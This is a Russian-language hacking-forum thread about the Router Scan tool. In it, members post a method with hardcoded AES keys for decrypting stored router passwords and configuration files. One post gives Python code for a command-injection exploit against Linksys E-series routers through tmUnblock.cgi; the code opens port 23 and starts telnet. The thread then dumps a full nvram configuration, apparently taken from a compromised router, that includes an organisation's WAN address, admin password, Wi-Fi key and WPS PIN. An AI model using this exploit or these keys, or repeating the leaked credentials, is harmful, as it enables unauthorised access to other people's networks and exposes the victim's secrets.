прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,248
    Reputations:
    148
    :D:D:D:D:D:D:D:D:D:D:D:D
     
    CRACK211 likes this.
  2. CRACK211

    CRACK211 Elder - Старейшина

    Joined:
    16 Sep 2009
    Messages:
    1,050
    Likes Received:
    1,128
    Reputations:
    11
    Чет я не подумал))) хорошо не буду.)))
     
    binarymaster likes this.
  3. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Было бы логичнее спросить об этом в соседней теме.

    Не обязательно, но желательно. Ибо могут остаться необработанные точки. "Планировщика заданий" у нас пока там нет.
     
  4. Ossen

    Ossen Active Member

    Joined:
    4 Jun 2015
    Messages:
    229
    Likes Received:
    155
    Reputations:
    0
    там ещё интересней есть если авторизоватся под мастер паролем и при этом к примеру выбрать язык интерфейса Русский то часть функций либо пропадёт либо изменится что то похожее наблюдается если зайти под парой root admin
     
    Payer and binarymaster like this.
  5. igorokkk

    igorokkk New Member

    Joined:
    18 Oct 2015
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Тысяча извинений, товарищи, только зарегался. У меня вопрос такой: а какой пароль на скачку?
     
  6. 1234IsDanger

    1234IsDanger Member

    Joined:
    3 Oct 2015
    Messages:
    25
    Likes Received:
    12
    Reputations:
    0
    Это простейший тест на внимательность, так что зайди на сайт и осмотрись.
     
    binarymaster and erwerr2321 like this.
  7. kolbak

    kolbak Member

    Joined:
    2 Feb 2011
    Messages:
    31
    Likes Received:
    52
    Reputations:
    0
    Тысяча тебе лещей. Прочти форум, каждый 4 спрашивает.
    Научитесь уважать людей в конференциях. Потрать немного своего времени дабы не тупить и не задавать тупые вопросы.

    Уважаемый, дай новую бетку пощупать. Ты уже столько "сладенького" добавил!
     
    Ossen, erwerr2321 and Payer like this.
  8. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    такова участь всех гениев. их всегда за что-то долбают :) то поклонники, то завистники :) на то он и гений, чтобы идти своим путем, не обращая внимание на мелочи :)
     
    kuz, binarymaster and Payer like this.
  9. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Релиз скоро будет, осталось сделать 2 страницы документации, и слегка доработать базу...
     
    V777, Upsurt, Mald and 7 others like this.
  10. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    616
    Likes Received:
    3,833
    Reputations:
    171
    1. Берём зашифрованный пароль $1;|W09fYX;*n5\[DuY88*.T!!$ и удаляем 1, 2 и последний символы: ;|W09fYX;*n5\[DuY88*.T!! (что в виде последовательности байт выглядит как [3b 7c 57 30 39 66 59 58 3b 2a 6e 35 5c 5b 44 75 59 38 38 2a 2e 54 21 21]).
      Все специальные последовательности (", &, < и т.д.), естественно, должны быть декодированы
    2. От каждого байта (если он не равен 0x7E) отнимаем 0x21 или (если равен 0x7E) заменяем на 0x1E: [1a 5b 36 0f 18 45 38 37 1a 09 4d 14 3b 3a 23 54 38 17 17 09 0d 33 00 00].
    3. Разбиваем последовательность на блоки по 24 байта (в данном примере - 1 блок).
    4. Первые 20 байт, по сути, это 4 числа в системе счисления с основанием 93 (по 5 байт на каждое). Декодируем их: a1 = 0x1a + 0x5b*93 + 0x36*93^2 + 0x0f*93^3 + 0x18*93^4 = 0x6BC1D772, a2 = ... В результате получим 16 байтовый блок: [72 d7 c1 6b a7 61 67 29 99 f7 dd 9e 87 56 3e 29] (как можно заметить, порядок байт - little endian).
    5. Оставшимися 4 байтами заменяем 12, 18, 24 и 30 байты в ключе [b8 36 3c 9b 77 da ed 4b 9a bb 9f 2f 6d f5 f1 d5 cb 64 97 5d 5d 3b ce e8 82 7f 2f 42 23 5f 92 29]. Т.е. ключ будет равен [b8 36 3c 9b 77 da ed 4b 9a bb 9f 0d 6d f5 f1 d5 cb 33 97 5d 5d 3b ce 00 82 7f 2f 42 23 00 92 29]
    6. Блок из п.4 расшифровываем ключом из п.5, используя AES ECB: [47 72 6f 6d 6f 2d 6f 74 76 6f 44 31 35 31 2f 35]. Или в виде строки: "Gromo-otvoD151/5"

    Видел роутеры (по-моему, ростелеком), где был зашифрован и конфигурационный файл
    Для расшифровки нужна утилита aescrypt2 (исходники можно найти в сети). Первые 8 байт в зашифрованном hw_ctree.xml это тип и CRC сумма - их нужно предварительно удалить. Ключ: 13395537D2730554A176799F6D56A239 (первая его половина из файла /etc/wap/aes_string, вторая зашита в коде)
    Code:
    # trim type and CRC
    tail -c +9 hw_ctree.xml > hw_ctree_temp.xml
    
    # decrypt
    aescrypt2 1 hw_ctree_temp.xml hw_ctree_dec.xml.gz hex:13395537D2730554A176799F6D56A239
    
    # ungzip
    gzip -d hw_ctree_dec.xml.gz
    
    rm hw_ctree_temp.xml

    От других паролей (например, от мастер-пароля) вообще хранится только SHA256(MD5(pass)) хэш


    Ну, и до кучи, алгоритм шифрования конфига F@ST 2804V7:
    Первые 4 байта - длина файла - удаляем. Остальное рашифровываем AES CBC (key="iwp2390x-e]57kx&#@*(ca,sfkf!eu+$" init_vec="fiw;opdd40382,*&")
    Пароли в нём зашифрованы AES ECB (key=0E 5C 06 77 F5 96 4A 07 E2 B2 F3 27 9B D2 CF A3) и первый байт надо ещё проXORить с 0x39.
     
    #1310 Felis-Sapiens, 19 Oct 2015
    Last edited: 19 Oct 2015
    quite gray, Kakoluk, sha9 and 13 others like this.
  11. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Вот тут не до конца понял, это есть ключ шифрования AES, или расшифрованный пароль PSK?
     
    #1311 binarymaster, 19 Oct 2015
    Last edited: 19 Oct 2015
  12. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    616
    Likes Received:
    3,833
    Reputations:
    171
    Расшифрованный пароль. Ключ - в п.5 (была опечатка - исправил)
     
  13. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,135
    Likes Received:
    1,931
    Reputations:
    24
    в hex формате
     
  14. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Там была опечатка с пунктами, сейчас всё стало на свои места. :)
     
  15. kolbak

    kolbak Member

    Joined:
    2 Feb 2011
    Messages:
    31
    Likes Received:
    52
    Reputations:
    0
    Низкий тебе поклон. Всегда поражался таким людям. (эх была бы машина времени то стал бы программистом)

    А случаем алгоритм ключей к "ростелекому" не нашел?
     
    sha9 likes this.
  16. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    616
    Likes Received:
    3,833
    Reputations:
    171
    Нет, в прошивках вроде его нет (хотя вполне возможно, что я просто не нашёл). Собственно, я ради этого и полез в прошивку :). А тут смотрю, возник вопрос по этому роутеру,
     
    Kakoluk, sha9, binarymaster and 2 others like this.
  17. gpuhash

    gpuhash Elder - Старейшина

    Joined:
    22 Sep 2011
    Messages:
    491
    Likes Received:
    2,159
    Reputations:
    97
    Не знаю реализован ли в RouterScan довольно старый RCE эксплойт в роутерах Linksys E1000, E1200, E1500 и др.

    https://www.exploit-db.com/exploits/31683/

    По ссылке выше довольно замороченная реализация с загрузкой шелл-кода, которая еще и не работает (по крайней мере на тех моделях, что попадались мне).
    Но можно сделать зело проще:

    Code:
    def send_cmd(data, http, url, headers, cmd):
    post_data = 'submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `' + cmd + '`&StartEPI=1'
      headers['Content-Type'] = 'application/x-www-form-urlencoded'
      headers['Authorization'] = 'Basic ' + base64.b64encode('admin:admin')
    
      http_post(data, http, url+'/tmUnblock.cgi', headers, post_data)
    
    send_cmd(data, http, url, headers, 'iptables -I INPUT -p tcp --dport 23 -j ACCEPT')
    send_cmd(data, http, url, headers, 'utelnetd')
    Дальше коннектимся на порт 23 и даем команду

    Code:
    nvram show
    Должен прилететь конфиг вот такого вида:

    filter_dport_grp3=
    wl_mac_deny=
    wl_radius_port=1812
    filter_dport_grp4=
    wan_unit=0
    filter=on
    filter_dport_grp5=
    wl0_default_ssid=Cisco92071
    device_info_mac30=00:16:76:12:7B:0C
    os_ram_addr=80001000
    antswctl2g=1
    filter_dport_grp6=
    dmz_dst_ip=1
    wl0_wmf_bss_enable=0
    wl0_net_mode=mixed
    device_info_mac31=00:08:74:B2:A1:71
    ping_size=32
    filter_dport_grp7=
    pc_passwd_deny=0
    filter_dport_grp8=
    wl0_frameburst=on
    wl_txstreams=0
    rxchain=3
    is_disconn_button=0
    filter_dport_grp9=
    wl_rxchain_pwrsave_pps=10
    log_ipaddr=0
    ddns_username_2=
    boardrev=0x1100
    wl0.14_hwaddr=5A:6D:8F:B1:F7:EC
    wl0_active_add_mac=0
    ppp_passwd=
    ppp_idletime=5
    wps_action=2
    wl_nctrlsb=
    et_pwrsave=0
    wl_version=5.60.120.19
    et0macaddr=58:6d:8f:b1:f7:ed
    wl0_leddc=0x640000
    ddns_enable=0
    dmz_src_ip=0.0.0.0 0
    wps_enable=1
    ipsec_debug=1
    skip_intel_check=0
    qos_appport1=0
    wan_get_dns=
    wl0_radarthrs=0 0x6a8 0x6c8 0x6ac 0x6c7
    wl0_wep_buf=
    wl0_akm=psk2
    wl_maxassoc=128
    ddns_hostname_buf=
    qos_appport2=0
    model_name=E1200
    watchdog=0
    boot_wait=on
    maxp2ga0=0x48
    get_language=
    qos_appport3=0
    maxp2ga1=0x48
    filter_web_host1=
    wl_phytypes=
    wl_leddc=0x640000
    wps_modelname=E1200
    qos_appport4=0
    tftpd_enable=1
    action_service_arg1=
    wl0_40m_disable=0
    filter_web_host2=
    wl0_infra=1
    qos_appport5=0
    device_info_set_flag20=0
    wl0_country_code=EU
    et0mdcport=0
    fw_disable=0
    filter_web_host3=
    qos_appport6=0
    device_info_set_flag21=0
    filter_web_host4=
    emf_rtport_entry=
    qos_appport7=0
    device_info_set_flag22=0
    filter_web_host5=
    test_channel=0
    qos_appport8=0
    wps_config_command=0
    device_info_set_flag23=0
    filter_web_host6=
    https_enable=0
    ddns_wildcard=OFF
    device_info_set_flag24=0
    filter_web_host7=
    wl_infra=1
    lltd_enable=1
    device_info_set_flag25=0
    reset_gpio=10
    filter_web_host8=
    l2tp_get_ip=
    device_info_set_flag26=0
    filter_web_host9=
    device_info_set_flag27=0
    pmon_ver=CFE 5.60.120.19
    ppp_get_ac=
    wl0_bcn_rotate=1
    pptp_server_ip=
    wl_stbc_tx=auto
    device_info_set_flag28=0
    get_sn=10810C1A192071
    restore_defaults=0
    wan_run_mtu=1500
    device_info_set_flag29=0
    vlan2ports=4 5
    wl0.1_hwaddr=58:6D:8F:B1:F7:F0
    ppp_username=
    filter_port=
    wan_lease=0
    wl0_nctrlsb=upper
    wl0_wme_sta_be=15 1023 3 0 0 off off
    QoS_lan_ctl=0
    dmz_mac=00:00:00:00:00:00
    wl_wme_apsd=on
    ddns_enable_buf=
    wl0_version=5.60.120.19
    filter_ip_grp1=
    http_wanport=8080
    wl_radius_ipaddr=
    ddns_hostname=
    ip_conntrack_tcp_timeouts=300 600 120 60 120 120 10 60 30 120
    machine_name=OCSMD-syslink
    wl0.7_hwaddr=5A:6D:8F:B1:F7:E5
    filter_ip_grp2=
    filter_ip_grp3=
    wl0_ifname=eth1
    ofdm2gpo=0x44444444
    lan_domain=
    filter_ip_grp4=
    gn_lan_ifnames=wl0.1
    dr_lan_rx=0
    fw_md5sum=317cd65c34f688ecdc3c5d11e44614c9
    timer_interval=1800
    filter_ip_grp5=
    wl0_wme_sta_bk=15 1023 7 0 0 off off
    filter_ip_grp6=
    lan1_ipaddr=192.168.2.1
    filter_rule1=
    filter_ip_grp7=
    wl0_rxchain_pwrsave_quiet_time=1800
    wl_net_reauth=36000
    filter_rule2=
    filter_ip_grp8=
    wl_radio_pwrsave_on_time=50
    wl0_rxstreams=0
    ipsec_pass=1
    hb_server_ip=
    qos_devmac1=00:00:00:00:00:00
    boot_ok=ok
    filter_rule3=
    filter_ip_grp9=
    qos_devmac2=00:00:00:00:00:00
    filter_rule4=
    gpio7=wps_status_led
    lan_route=
    filter_rule5=
    device_info_name10=
    gpio8=wps_led
    wps_device_pin=41461297
    filter_rule6=
    filter_ip_grp10=
    wl0_mrate=0
    device_info_name11=
    gpio9=wps_button
    wan_gateway=125.209.97.17
    filter_rule7=
    wl0_mode=ap
    device_info_name12=
    wl0.1_active_add_mac=0
    filter_rule8=
    dhcp_start=100
    device_info_name13=
    mcs2gpo0=0x3333
    filter_rule9=
    wl0_stbc_tx=auto
    device_info_name14=
    mcs2gpo1=0x6663
    lan1_route=
    wl0_ap_isolate=0
    ident_pass=0
    device_info_name15=
    cfe_ping_timeout=2
    mcs2gpo2=0x3333
    wl0_rxchain_pwrsave_pps=10
    wl_mrate=0
    device_info_set_flag30=0
    device_info_name16=
    mcs2gpo3=0x6663
    triso2g=3
    wl_wmf_bss_enable=0
    wl_akm=psk2
    l2tp_server_ip=
    device_info_set_flag31=0
    device_info_name17=
    wl0.15_hwaddr=5A:6D:8F:B1:F7:ED
    mcs2gpo4=0x6666
    sromrev=8
    dhcp_lease=0
    wl0_gmode=1
    wl0_ampdu=on
    wl0_wme_no_ack=off
    device_info_name18=
    mcs2gpo5=0x6666
    qos_devpri1=0
    device_info_name19=
    mcs2gpo6=0x6666
    get_mac_index=1
    remote_ip_any=1
    qos_devpri2=0
    mcs2gpo7=0x6666
    boardtype=0xF53A
    gn_white_list=
    aa2g=3
    wl_active_add_mac=0
    is_default=0
    wl_wme_bss_disable=0
    device_info_set_flag0=0
    device_info_set_flag1=0
    ping_ip=
    wl_gmode=1
    wl0_nband=2
    wl_ampdu=on
    device_info_set_flag2=0
    stats_server=
    wl0_auth_type=0
    device_info_set_flag3=0
    get_wps_pin=41461297
    static_route=
    sock_rmem_max=66560
    device_info_set_flag4=0
    wl0_nreqd=0
    PC_enable=0 0 0
    device_info_set_flag5=0
    extpagain2g=2
    lan_netmask=255.255.255.0
    wl0_wep_last=
    wps_enr_mode=enabled
    device_info_set_flag6=0
    lan1_ifname=br1
    dmz_enable=0
    wl_nband=2
    wl0_wme_txp_be=7 3 4 2 0
    ddns_backmx=NO
    device_info_mac0=2C:33:7A:41:89:0B
    device_info_set_flag7=0
    device_info_mac1=2C:33:7A:49:FE:DD
    lan1_hwnames=
    http_username=
    wl0_ssid=OCSIT
    wl0_dtim=1
    wps_akm=psk2
    wl_wme_sta_vi=7 15 2 6016 3008 off off
    EC_Server=1
    get_country=AU
    del_static_route=
    device_info_set_flag8=0
    device_info_mac2=2C:D0:5A:9A:DC:E2
    tssipos2g=1
    port_trigger=
    manual_rate=0
    device_info_set_flag9=0
    device_info_mac3=2C:33:7A:4A:1E:F5
    wps_recv_m2d=0
    filter_web_host10=
    wl_nreqd=0
    wl_wme_ap_be=15 63 3 0 0 off off
    qos_devname1=
    device_info_mac4=D0:22:BE:33:CE:FD
    os_date=Jan 23 2011
    wl0_dfs_preism=60
    qos_devname2=
    device_info_mac5=00:24:81:EA:C1:9D
    boardpwrctl=0xC00
    device_info_mac6=00:13:20:DC:14:18
    bw40po=0x0000
    http_lanport=80
    wl0_wme_txp_bk=7 3 4 2 0
    device_info_mac7=00:14:22:32:CE:3D
    itt2ga0=0x20
    filter_mac_grp1=
    wl_plcphdr=long
    wl_wme_sta_vo=3 7 2 3264 1504 off off
    device_info_mac8=BC:98:89:45:77:70
    itt2ga1=0x20
    lan1_wins=
    filter_mac_grp2=
    ppp_redialperiod=30
    ppp_service=
    wl_macmode=disabled
    device_info_mac9=00:04:75:FE:82:86
    nvram_version=1
    wan_hwname=
    wan_domain=ocsmd.ocsfirewall.ocs.com.pk
    filter_mac_grp3=
    wl_wme_ap_bk=15 1023 7 0 0 off off
    add_static_route=
    wl0id=0x4347
    lan_lease=86400
    wan_netmask=255.255.255.240
    filter_mac_grp4=
    wl_phytype=g
    gn_account_duration=24
    warning_http_port=52000
    wl0_key1=
    filter_mac_grp5=
    wl_lazywds=0
    wl0_key2=
    wl0_vlan_prio_mode=off
    turn_leds=1
    wl0.2_hwaddr=5A:6D:8F:B1:F7:E0
    filter_mac_grp6=
    wl0_key3=
    wl_dfs_postism=60
    filter_mac_grp7=
    wl0_key4=
    wl0.1_maclist=
    device_info_name20=
    filter_client0=
    filter_mac_grp8=
    wl0_mac_filter=0
    device_info_name21=
    wl_max_channel=13
    lan1_lease=86400
    filter_maclist=
    filter_mac_grp9=
    device_info_name22=
    ppp_demand=0
    wl0_vifs=
    wl_auth_mode=none
    pptp_get_ip=
    pptp_pass=1
    QoS_wan_speed=71680
    device_info_name23=
    wl0.8_hwaddr=5A:6D:8F:B1:F7:E6
    ppp_keepalive=0
    mtu_enable=0
    device_info_name24=
    device_info_name25=
    vlan2hwname=et0
    block_activex=0
    device_info_name26=
    device_info_name27=
    wl0_hw_rxchain=3
    ag0=0x82
    http_passwd=pakistanocs
    wl0_rxchain_pwrsave_enable=1
    wl_wpa_psk=sh80gh15o
    remote_mgt_https=0
    device_info_name28=
    pa2gw2a0=0xFB1C
    ag1=0x4
    gn_lan_ipaddr=192.168.33.1
    block_wan=1
    device_info_name29=
    pa2gw2a1=0xFB1F
    lan_stp=0
    wl0_wme_ap_vi=7 15 1 6016 3008 off off
    wl_mode=ap
    wl0_bss_maxassoc=128
    skip_amd_check=0
    default_lang=0
    wl0_closed=0
    wl0_rate=0
    wl0_plcphdr=long
    wl0.10_hwaddr=5A:6D:8F:B1:F7:E8
    xtalfreq=20000
    wl0_macmode=disabled
    wl_wpa_gtk_rekey=3600
    lan_dhcp=0
    wl0_radioids=BCM2057
    wl0_wme_ap_vo=3 7 1 3264 1504 off off
    wl0_phytype=n
    wl_wme_txp_vi=7 3 4 2 0
    antswitch=0
    filter_tod_buf1=
    wl0_lazywds=0
    security_mode2=wpa2_personal
    wps_crypto=aes
    dr_wan_rx=0
    filter_tod_buf2=
    https_key=
    block_proxy=0
    filter_tod_buf3=
    blink_diag_led=1
    boardflags2=0x00000000
    upnp_ssdp_interval=60
    filter_tod_buf4=
    port_rate_limit_1=0
    wps_proc_status=0
    filter_tod_buf5=
    wl_default_ssid=Cisco92071
    port_rate_limit_2=0
    filter_tod_buf6=
    wl0_afterburner=off
    wl_wme_txp_vo=7 3 4 2 0
    dr_lan_tx=0
    port_rate_limit_3=0
    lan_hwaddr=58:6D:8F:B1:F7:ED
    filter_tod10=
    filter_tod_buf7=
    wl_wds_timeout=1
    wl0_antdiv=-1
    port_rate_limit_4=0
    wan_dns=8.8.8.8 4.2.2.1
    filter_tod_buf8=
    wl_wps_mode=enabled
    filter_tod_buf9=
    http_client_mac=
    action_service=
    wl_ssid=OCSIT
    gn_account_password=guest
    wl_dtim=1
    ip_conntrack_max=8192
    wl_radarthrs=0 0x6a8 0x6c8 0x6ac 0x6c7
    wl0_wpa_psk=sh80gh15o
    lan_wps_oob=disabled
    wait_time=3
    gn_lan_ifname=br1
    device_info_name30=
    web_wl_filter=0
    public_ip=
    device_info_name31=
    wl0_amsdu=off
    flash_type=SFLASH 4096 kB
    daylight_time=1
    gn_dhcp_num=50
    wl_passphrase=
    wl0_mac_list=
    tftp_recv_timeout=3
    dhcp_wins=wan
    security_mode=psk2
    os_server=
    filter_tod_buf10=
    multicast_pass=1
    clkdivsf=2
    ledbh0=11
    wan_proto=static
    wl_key1=
    wl_amsdu=off
    lan_wps_reg=enabled
    hb_server_domain=
    ledbh1=11
    wl_key2=
    ledbh2=11
    bwduppo=0
    wl_key3=
    wl0_unit=0
    wl_country_code=EU
    ledbh3=11
    wl_key4=
    txchain=3
    wl_hwaddr=
    wl0.3_hwaddr=5A:6D:8F:B1:F7:E1
    ledbh5=7
    aol_block_traffic1=0
    QoS_lan_speed=61440
    static_route_name=
    wl0_bss_enabled=1
    wl0_net_reauth=36000
    aol_block_traffic2=0
    tftpd_ipaddr=192.168.1.254
    wl_vlan_prio_mode=off
    wps_count=0
    lan1_stp=1
    gn_enable=0
    wl0_nmode=-1
    wps_timeout_enable=0
    wl0.9_hwaddr=5A:6D:8F:B1:F7:E7
    ntp_enable=1
    wl_net_mode=mixed
    wl_active_mac=
    dhcp_statics=
    upbunit=0
    enable_game=0
    remote_ip=0.0.0.0 0
    forward_port=
    wps_restart=0
    wps_nwkey=sh80gh15o
    wl_nmode=-1
    get_country_index=1
    lan1_gateway=192.168.2.1
    wl_rxstreams=0
    wl_wps_reg=disabled
    sel_qosport1=0
    wps_ssr_ipaddr=
    filter_mac_grp10=
    wl0_wds=
    wps_security_auto=0
    sel_qosport2=0
    ppp_static_ip=
    wl_rate=0
    sel_qosport3=0
    log_level=0
    block_java=0
    forward_portsip=
    ddns_service=dyndns
    sel_qosport4=0
    ct_modules=
    ntp_server=
    wl0_reg_mode=off
    pptp_dhcp=0
    sel_qosport5=0
    wan_hwaddr=58:6D:8F:B1:F7:EE
    wps_mfstring=Cisco
    sel_qosport6=0
    QoS_cnt=0
    wl0.11_hwaddr=5A:6D:8F:B1:F7:E9
    sel_qosport7=0
    lan_ifnames=vlan1 eth1 eth2 eth3
    sel_qosport8=0
    pppoe_ifname=
    wl_40m_disable=0
    wl0_auth=0
    wl0_wme=on
    wl0_mac_deny=
    wl0_radius_port=1812
    wl_rxchain_pwrsave_quiet_time=1800
    wl0_rxchain=3
    wl0_wme_bss_disable=0
    wl0_radius_ipaddr=
    wl_radio_pwrsave_pps=10
    wl_country=EU
    leddc=0xFFFF
    gn_last_cable_stat=0
    ure_disable=1
    wl0_wme_sta_vi=7 15 2 6016 3008 off off
    tftp_rrq_timeout=3
    mfg_radio=off
    traceroute_ip=
    ddns_change=
    disable_check_ps=0
    wan_ifnames=vlan2
    wl_auth_type=0
    remote_management=1
    gn_approval_list=
    wl_rateset=default
    wl_crypto=aes
    wl0_wme_sta_vo=3 7 2 3264 1504 off off
    block_loopback=0
    wl0_random_channel=6
    pa2gw1a0=0x163B
    http_method=post
    ppp_mru=1500
    wl_wep_bit=64
    wl0_wps_reg=disabled
    wan_conn_time=0
    pa2gw1a1=0x14A2
    throughput_test=0
    wl0.1_mode=ap
    lan_ipaddr=192.168.1.1
    clkfreq=300,150,75
    os_name=linux
    upnp_internet_dis=0
    lan_proto=dhcp
    filter_port_grp1=
    wl_radius_key=
    QoS=0
    vlan1hwname=et0
    get_pa1idxval=
    lan1_netmask=255.255.255.0
    filter_port_grp2=
    wl_rxchain_pwrsave_enable=1
    wl0_maxassoc=128
    filter_port_grp3=
    filter_port_grp10=
    wl0_radio_pwrsave_on_time=50
    ddns_passwd_2=
    filter_id=1
    filter_port_grp4=
    wl_unit=0
    dr_wan_tx=0
    pa1idx=0
    filter_port_grp5=
    wl0_phytypes=n
    wan_link=0
    router_disable=0
    lan1_proto=dhcp
    filter_port_grp6=
    wl0_wep=disabled
    wl0_frag=2346
    wl_nmode_protection=auto
    wps_sta_pin=00000000
    filter_port_grp7=
    wl0.1_closed=0
    ddns_username=
    filter_port_grp8=
    wl_radio_pwrsave_enable=0
    ddns_passwd=
    wl0.4_hwaddr=5A:6D:8F:B1:F7:E2
    filter_port_grp9=
    wl0_nbw=0
    sdram_config=0x0206
    log_enable=0
    ppp_ac=
    wl0_country=EU
    filter_web_url10=
    vlan1ports=0 1 2 3 5*
    dmz_ipaddr=0
    wl_wds=
    security_mode_last=
    auth_exemption_list=
    ddns_hostname_2=
    ccode=0
    boot_hw_ver=1.0
    wps_result=0
    wl0.1_ssid=OCSIT-guest
    wl0_rateset=default
    wl0.1_mac_list=
    wl0_wme_apsd=on
    wl0_wep_bit=64
    wl0_wme_txp_vi=7 3 4 2 0
    TMSSS_enable=0 0 65
    wl_wme=on
    wl0_txstreams=0
    port_flow_control_1=0
    ping_times=5
    get_mac=58:6d:8f:b1:f7:ed\FF
    gn_max_account=5
    forward_single=
    port_flow_control_2=0
    lan_ifname=br0
    wan_primary=1
    wps_ie=enabled
    wl_wme_ap_vi=7 15 1 6016 3008 off off
    remote_upgrade=0
    port_flow_control_3=0
    boardflags=0x00000710
    filter_services=$NAME:003:DNS$PROT:003:udp$PORT:005:53:53<&nbsp;>$NAME:004:ping$PROT:004:icmp$PORT:003:0:0<&nbsp;>$NAME:004:HTTP$PROT:003:tcp$PORT:005:80:80<&nbsp;>$NAME:005:HTTPS$PROT:003:tcp$PORT:007:443:443<&nbsp;>$NAME:003:FTP$PROT:003:tcp$PORT:005:21:21<&nbsp;>$NAME:004:pOP3$PROT:003:tcp$PORT:007:110:110<&nbsp;>$NAME:004:IMAP$PROT:003:tcp$PORT:007:143:143<&nbsp;>$NAME:004:SMTP$PROT:003:tcp$PORT:005:25:25<&nbsp;>$NAME:004:NNTP$PROT:003:tcp$PORT:007:119:119<&nbsp;>$NAME:006:Telnet$PROT:003:tcp$PORT:005:23:23<&nbsp;>$NAME:004:SNMP$PROT:003:udp$PORT:007:161:161<&nbsp;>$NAME:004:TFTP$PROT:003:udp$PORT:005:69:69<&nbsp;>$NAME:003:IKE$PROT:003:udp$PORT:007:500:500<&nbsp;>
    port_flow_control_4=0
    sdram_refresh=0x0000
    wandevs=et0
    gn_cur_account=0
    pa0idx=0
    dhcp_domain=wan
    wl0_wme_txp_vo=7 3 4 2 0
    wl0.12_hwaddr=5A:6D:8F:B1:F7:EA
    wl_auth=0
    sdram_ncdl=0x00000000
    wl_wep_last=
    wps_proc_mac=
    lan1_domain=
    wl_wme_ap_vo=3 7 1 3264 1504 off off
    wan_gateway_buf=0.0.0.0
    block_cookie=0
    get_wps_pin_index=1
    ezc_enable=1
    wl_frameburst=on
    wl_bss_maxassoc=128
    wan_ipaddr_used=0
    wan_iface=vlan2
    https_cert=
    wl0_radio_pwrsave_pps=10
    wl0_nmode_protection=auto
    wan_pptp_dhcp_dns=
    upnp_wan_proto=
    is_modified=0
    wan_ipaddr_buf=125.209.97.22
    reboot_time=25
    wan_ipaddr=125.209.97.22
    filter_web_url1=
    dhcp_num=50
    pdetrange2g=2
    macaddr=00:90:4C:01:50:2a
    filter_web_url2=
    wl0_passphrase=
    filter_web_url3=
    filter_web_url4=
    wl0_rts=2347
    filter_web_url5=
    lan1_dhcp=0
    wan_wins=0.0.0.0
    filter_web_url6=
    wl_ifname=
    warning_page_checked=0
    wl_nbw_cap=1
    filter_web_url7=
    http_enable=1
    wl_wep=disabled
    ntp_mode=auto
    ui_language=en
    wl0_hw_txchain=3
    get_language_index=0
    filter_web_url8=
    gn_http_port=51000
    gn_bw_upstream=56
    l2tp_pass=1
    cck2gpo=0x0000
    os_version=5.70.13.0
    filter_web_url9=
    wan_speed=4
    gn_wan_stat_record=0
    wl_gmode_protection=auto
    wl_nbw=0
    qos_appname1=
    wl0_wpa_gtk_rekey=3600
    qos_appname2=
    wl_random_channel=6
    device_info_mac10=00:20:4A:ED:14:A9
    hnap_enable=1
    ppp_get_srv=
    wl0_sta_retry_time=5
    mac_clone_enable=0
    qos_appname3=
    device_info_mac11=58:6D:8F:6E:01:42
    wl_frag=2346
    qos_appname4=
    device_info_mac12=00:19:B9:4A:73:0B
    upnp_forward_max=0
    gn_https_port=51001
    wl0_key=1
    wl0.1_macmode=disabled
    wl_wep_gen=
    wan_mtu=1500
    qos_appname5=
    device_info_mac13=44:6D:57:13:43:D1
    regrev=0
    wl0_active_mac=
    qos_appname6=
    device_view_type=0
    device_info_mac14=00:0D:56:DA:97:AA
    filter_macmode=deny
    wl_maclist=
    emf_entry=
    rate_mode=1
    qos_appname7=
    device_info_mac15=00:08:74:12:7D:D7
    mfg_wait=off
    qos_appname8=
    device_info_mac16=90:F6:52:31:ED:CC
    et0phyaddr=30
    console_loglevel=1
    http_from=wan
    device_info_mac17=00:23:5A:19:B1:BE
    wl0.5_hwaddr=5A:6D:8F:B1:F7:E3
    time_zone=-08 1 1
    wl_bcn_rotate=1
    ddns_mx=
    tmsss_enabled=0
    device_info_mac18=00:18:F3:EC:2E:C1
    wan_auto_detect_result=UNKNOWN
    wl_wps_config_state=1
    device_info_mac19=00:0E:0C:BC:AD:34
    wan_get_domain=
    wan_ifname=vlan2
    upnp_max_age=180
    wl_wme_sta_be=15 1023 3 0 0 off off
    wl_radioids=
    landevs=vlan1 wl0
    wan_hostname=OCSIT
    wl0_dfs_postism=60
    hnap_rc_status=idle
    boot_hw_model=E1200
    detect_lang=EN
    dhcp1_start=192.168.2.100
    ppp_mtu=1500
    wl_corerev=
    wl0_radio=1
    wl_nmcsidx=-1
    wl0_nbw_cap=1
    log_type=ilog
    ddns_interval=60
    wl0_max_channel=13
    wl_channel=0
    tftp_max_retries=5
    wl0_bcn=100
    wps_mode=enabled
    wl_wme_sta_bk=15 1023 7 0 0 off off
    manual_boot_nv=0
    port_priority_1=0
    wps_currentband=
    pa2gw0a0=0xFF52
    wl0_hwaddr=58:6D:8F:B1:F7:EF
    filter_tod1=
    ppp_static=0
    wl_radio=1
    wl_afterburner=off
    port_priority_2=0
    pa2gw0a1=0xFF38
    filter_tod2=
    gn_lan_netmask=255.255.255.0
    port_priority_3=0
    filter_tod3=
    port_priority_4=0
    ezc_version=2
    filter_tod4=
    wl0_wep_gen=
    emf_enable=0
    wl0.13_hwaddr=5A:6D:8F:B1:F7:EB
    filter_tod5=
    wl0_gmode_protection=auto
